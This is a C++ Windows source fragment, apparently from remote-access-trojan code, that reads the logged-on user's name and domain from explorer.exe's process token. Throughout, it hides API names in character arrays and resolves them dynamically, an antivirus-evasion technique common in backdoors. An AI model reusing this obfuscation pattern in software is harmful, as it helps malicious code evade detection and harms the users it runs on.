char *GetLogUser2K()
{
typedef BOOL
(WINAPI
*OpenProcessTokenT)(
__in HANDLE ProcessHandle,
__in DWORD DesiredAccess,
__deref_out PHANDLE TokenHandle
);
char KIoFqQPSy[] = {'A','D','V','A','P','I','3','2','.','d','l','l','\0'};
OpenProcessTokenT pOpenProcessToken=(OpenProcessTokenT)GetProcAddress(LoadLibrary(KIoFqQPSy),"OpenProcessToken");
typedef BOOL
(WINAPI
*LookupAccountSidAT)(
__in_opt LPCSTR lpSystemName,
__in PSID Sid,
__out_ecount_part_opt(*cchName, *cchName + 1) LPSTR Name,
__inout LPDWORD cchName,
__out_ecount_part_opt(*cchReferencedDomainName, *cchReferencedDomainName + 1) LPSTR ReferencedDomainName,
__inout LPDWORD cchReferencedDomainName,
__out PSID_NAME_USE peUse
);
LookupAccountSidAT pLookupAccountSidA=(LookupAccountSidAT)GetProcAddress(LoadLibrary(KIoFqQPSy),"LookupAccountSidA");
typedef BOOL
(WINAPI
*GetTokenInformationT)(
__in HANDLE TokenHandle,
__in TOKEN_INFORMATION_CLASS TokenInformationClass,
__out_bcount_part_opt(TokenInformationLength, *ReturnLength) LPVOID TokenInformation,
__in DWORD TokenInformationLength,
__out_opt PDWORD ReturnLength
);
GetTokenInformationT pGetTokenInformation=(GetTokenInformationT)GetProcAddress(LoadLibrary(KIoFqQPSy),"GetTokenInformation");
typedef HANDLE
(WINAPI
*OpenProcessT)(
__in DWORD dwDesiredAccess,
__in BOOL bInheritHandle,
__in DWORD dwProcessId
);
OpenProcessT pOpenProcess=(OpenProcessT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"OpenProcess");
DWORD dwProcessID = GetProcessID("explorer.exe");
if (dwProcessID == 0)
return NULL;
BOOL fResult = FALSE;
HANDLE hProc = NULL;
HANDLE hToken = NULL;
TOKEN_USER *pTokenUser = NULL;
char *lpUserName = NULL;
__try
{
// Open the process with PROCESS_QUERY_INFORMATION access
hProc = pOpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwProcessID);
if (hProc == NULL)
{
__leave;
}
fResult = pOpenProcessToken(hProc, TOKEN_QUERY, &hToken);
if(!fResult)
{
__leave;
}
DWORD dwNeedLen = 0;
fResult = pGetTokenInformation(hToken,TokenUser, NULL, 0, &dwNeedLen);
if (dwNeedLen > 0)
{
pTokenUser = (TOKEN_USER*)new BYTE[dwNeedLen];
fResult = pGetTokenInformation(hToken,TokenUser, pTokenUser, dwNeedLen, &dwNeedLen);
if (!fResult)
{
__leave;
}
}
else
{
__leave;
}
SID_NAME_USE sn;
TCHAR szDomainName[MAX_PATH];
DWORD dwDmLen = MAX_PATH;
DWORD nNameLen = 256;
lpUserName = new char[256];
fResult = pLookupAccountSidA(NULL, pTokenUser->User.Sid, lpUserName, &nNameLen,
szDomainName, &dwDmLen, &sn);
}
__finally
{
if (hProc)
::CloseHandle(hProc);
if (hToken)
::CloseHandle(hToken);
if (pTokenUser)
delete[] (char*)pTokenUser;
return lpUserName;
}
}
//=================获得当前登陆用户名及计算机名称====================
BOOL GetCurrentUserName(char szUser[],char szDomain[])
{
HANDLE hToken;
//得到shell的token
if(!GetTokenByName(hToken,"EXPLORER.EXE"))
{
return FALSE;
}
DWORD cbti = 0;
PTOKEN_USER ptiUser = NULL;
SID_NAME_USE snu;
//取得所需空间大小
char JwFNw01[] = {'G','e','t','T','o','k','e','n','I','n','f','o','r','m','a','t','i','o','n','\0'};
GetTokenInformationT pGetTokenInformation=(GetTokenInformationT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),JwFNw01);
char BrmAP29[] = {'C','l','o','s','e','H','a','n','d','l','e','\0'};
CloseHandleT pCloseHandle=(CloseHandleT)GetProcAddress(LoadLibrary("KERNEL32.dll"),BrmAP29);
if (pGetTokenInformation(hToken, TokenUser, NULL, 0, &cbti))
{
pCloseHandle(hToken);
return FALSE;
}
//分配空间
char JwFNw02[] = {'G','e','t','P','r','o','c','e','s','s','H','e','a','p','\0'};
GetProcessHeapT pGetProcessHeap=(GetProcessHeapT)GetProcAddress(LoadLibrary("KERNEL32.dll"),JwFNw02);
char JwFNw03[] = {'H','e','a','p','A','l','l','o','c','\0'};
HeapAllocT pHeapAlloc=(HeapAllocT)GetProcAddress(LoadLibrary("KERNEL32.dll"),JwFNw03);
ptiUser = (PTOKEN_USER) pHeapAlloc(pGetProcessHeap(), 0, cbti);
if(!ptiUser)
{
pCloseHandle(hToken);
return FALSE;
}
//取得token信息
char JwFNw05[] = {'H','e','a','p','F','r','e','e','\0'};
HeapFreeT pHeapFree=(HeapFreeT)GetProcAddress(LoadLibrary("KERNEL32.dll"),JwFNw05);
if (!pGetTokenInformation(hToken, TokenUser, ptiUser, cbti, &cbti))
{
pCloseHandle(hToken);
pHeapFree(pGetProcessHeap(), 0, ptiUser);
return FALSE;
}
DWORD nUser = 50;
DWORD nDomain = 50;
//根据用户的sid得到用户名和domain
char JwFNw06[] = {'L','o','o','k','u','p','A','c','c','o','u','n','t','S','i','d','A','\0'};
LookupAccountSidAT pLookupAccountSidA=(LookupAccountSidAT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),JwFNw06);
if (!pLookupAccountSidA(NULL, ptiUser->User.Sid, szUser, &nUser, szDomain, &nDomain, &snu))
{
pCloseHandle(hToken);
pHeapFree(pGetProcessHeap(), 0, ptiUser);
return FALSE;
}
pCloseHandle(hToken);
pHeapFree(pGetProcessHeap(), 0, ptiUser);
return TRUE;
}
